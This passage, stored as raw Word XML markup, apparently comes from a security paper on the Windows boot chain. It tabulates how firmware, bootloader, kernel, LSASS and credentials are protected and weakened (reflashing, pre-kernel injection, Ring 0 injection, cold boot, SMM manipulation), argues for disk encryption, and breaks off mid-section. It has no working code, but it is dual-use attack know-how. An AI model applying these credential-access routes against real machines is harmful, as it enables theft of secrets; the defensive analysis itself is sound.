30vH7ZRG/c/EJZfAQAA//8DAFBLAwQUAAYACAAAACEAMY1i&#10;598AAAAIAQAADwAAAGRycy9kb3ducmV2LnhtbEyPQUvDQBCF74L/YRnBW7vZqtXEbEop6qkItoJ4&#10;22anSWh2NmS3SfrvHU96HN7Hm+/lq8m1YsA+NJ40qHkCAqn0tqFKw+f+dfYEIkRD1rSeUMMFA6yK&#10;66vcZNaP9IHDLlaCSyhkRkMdY5dJGcoanQlz3yFxdvS9M5HPvpK2NyOXu1YukmQpnWmIP9Smw02N&#10;5Wl3dhreRjOu79TLsD0dN5fv/cP711ah1rc30/oZRMQp/sHwq8/qULDTwZ/JBtFqWDwyqGF2r3gS&#10;58s0USAODKYpyCKX/wcUPwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQB&#10;AAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQB9Y4bBXwMAAGgM&#10;AAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQAxjWLn3wAA&#10;AAgBAAAPAAAAAAAAAAAAAAAAALkFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAxQYA&#10;AAAA&#10;">
                <v:shape id="Shape 1467" o:spid="_x0000_s1027" style="position:absolute;width:43651;height:0;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="436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OTfwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9LawIx&#10;EL4X+h/CFLxptipWVqOI4ONgLbrqedhMd7fdTJYk6vbfNwWht/n4njOdt6YWN3K+sqzgtZeAIM6t&#10;rrhQcMpW3TEIH5A11pZJwQ95mM+en6aYanvnA92OoRAxhH2KCsoQmlRKn5dk0PdsQxy5T+sMhghd&#10;IbXDeww3tewnyUgarDg2lNjQsqT8+3g1Cs6b7MqbOuMdflz2bq31IHy9K9V5aRcTEIHa8C9+uLc6&#10;zh+O3uDvm3iCnP0CAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAVsDk38MAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m,l4365130,e" filled="f" strokeweight=".28117mm">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,4365130,0"/>
                </v:shape>
                <v:rect id="Rectangle 1469" o:spid="_x0000_s1028" style="position:absolute;left:14283;top:448;width:977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45C40E36" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:w w:val="110"/>
                          </w:rPr>
                          <w:t>Protected</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:spacing w:val="17"/>
                            <w:w w:val="110"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:w w:val="110"/>
                          </w:rPr>
                          <w:t>By</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 1471" o:spid="_x0000_s1029" style="position:absolute;top:2173;width:43651;height:0;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="436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qblwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/dasIw&#10;FL4f7B3CGXgzZlqRdVajDGGiIIxpH+DQHJtqc1KaqPXtjSDs7nx8v2e26G0jLtT52rGCdJiAIC6d&#10;rrlSUOx/Pr5A+ICssXFMCm7kYTF/fZlhrt2V/+iyC5WIIexzVGBCaHMpfWnIoh+6ljhyB9dZDBF2&#10;ldQdXmO4beQoST6lxZpjg8GWlobK0+5sFejl7z6dvG9PfN6ujDn6IjObQqnBW/89BRGoD//ip3ut&#10;4/xxlsLjm3iCnN8BAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAsCKm5cMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m,l4365130,e" filled="f" strokeweight=".17575mm">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,4365130,0"/>
                </v:shape>
                <v:rect id="Rectangle 1473" o:spid="_x0000_s1030" style="position:absolute;left:14283;top:2602;width:699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022FC2ED" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:w w:val="106"/>
                          </w:rPr>
                          <w:t>Firmware</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>BIOS/UEFI</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Physical </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reflashing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="6856" w:type="dxa"/>
        <w:tblInd w:w="27" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2250"/>
        <w:gridCol w:w="2604"/>
        <w:gridCol w:w="2002"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FC7A97" w14:paraId="43C96F6F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="458"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2249" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="17515CF8" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Bootloader</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2604" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="27684FCA" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Signature (Secure Boot)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2002" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="67C9CCFA" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="10" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Firmware access, unsigned boot media</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC7A97" w14:paraId="395D2453" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="239"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2249" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="21C4BC49" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Kernel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2604" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1377F086" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Boot chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2002" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7B52FA66" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="10" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Pre-kernel injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC7A97" w14:paraId="4694E93B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="239"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2249" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="45475500" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>LSASS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2604" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5C94BA77" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Kernel mode, PPL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2002" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="50C23C6C" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="10" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Ring 0 code injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC7A97" w14:paraId="0C733679" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="458"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2249" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="59C448C9" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2604" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5A292461" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2002" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="77658383" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="10" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Ring 0 memory access, cold boot attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC7A97" w14:paraId="5FA544FD" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="342"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2249" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3AFD796D" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2604" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="292830A7" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Protected By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2002" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="05DF3948" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Weakened By</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC7A97" w14:paraId="5ABFF05C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="581"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2249" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="625482D6" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>VBS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2604" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5F2C3F48" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Hypervisor isolation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2002" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3F848A71" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="10" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>SMM manipulation, firmware modification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1074D510" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="275"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>At each level, if an attacker can access the lower level, the protections of the higher level become irrelevant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1E7FE8" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="126" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>8.2 Why Persistent Encryption is the Solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461DD0DB" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The only protection that survives physical access is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>persistent encryption at the hardware level</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E238DB" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="2"/>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">BitLocker (Full Disk Encryption): </w:t>
      </w:r>
      <w:r>
        <w:t>Prevents bootloader from reading kernel files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ABCE21" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="2"/>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">TPM (Trusted Platform Module): </w:t>
      </w:r>
      <w:r>
        <w:t>Protects encryption keys from firmware tampering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370F6DAE" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Hardware Security Keys: </w:t>
      </w:r>
      <w:r>
        <w:t>Move critical decisions out of software entirely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EF7932" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>But even these have limitations: - Cold boot attacks (extract keys from RAM before shutdown) - TPM bypass through SMM modifications - Side-channel attacks (power analysis, electromagnetic emanations)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F26D79" w14:textId="658729EB" w:rsidR="00FC7A97" w:rsidRDefault="00000000" w:rsidP="00AD5226">
      <w:pPr>
        <w:spacing w:after="66" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The fundamental principle: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Encryption in storage is the only </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> against physical access; encryption in RAM alone is insufficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36723BE9" w14:textId="77777777" w:rsidR="00AD5226" w:rsidRDefault="00AD5226" w:rsidP="00AD5226">
      <w:pPr>
        <w:spacing w:after="66" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="105E7F98" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="341" w:right="673" w:hanging="329"/>
      </w:pPr>
      <w:r>
        <w:t>Synthesis &amp; Implications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1451AC62" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="126" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>9.1 Key Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4EEDFE" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="2"/>
        <w:ind w:right="1471" w:hanging="255"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Physical access implies logical compromise </w:t>
      </w:r>
      <w:r>
        <w:t>in systems without persistent encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0CDA34" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="1471" w:hanging="255"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">The firmware-to-kernel transition is a critical vulnerability point </w:t>
      </w:r>
      <w:r>
        <w:t>when untrusted code can interject itself</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571BC7D1" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="1471" w:hanging="255"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Software-based protections (DSE, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PatchGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>) cannot defend against Ring 0 code injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCD8F57" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="1471" w:hanging="255"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>User-mode process memory is less aggressively monitored than kernel memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C00E474" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="271" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="1471" w:hanging="255"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Commercial password recovery utilities validate this attack methodology in practice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79492CE6" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="126" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>9.2 Implications for System Design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B6214F" w14:textId="2D28C092" w:rsidR="00B44662" w:rsidRPr="00B44662" w:rsidRDefault="00B44662" w:rsidP="00B44662">
      <w:pPr>
        <w:spacing w:after="69"/>
